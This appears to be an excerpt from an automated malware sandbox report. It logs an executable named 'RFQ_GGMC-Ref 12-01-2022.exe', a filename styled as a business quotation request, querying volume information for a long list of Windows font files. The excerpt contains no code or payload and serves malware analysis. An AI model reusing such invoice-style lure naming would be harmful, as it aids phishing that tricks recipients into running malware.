                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
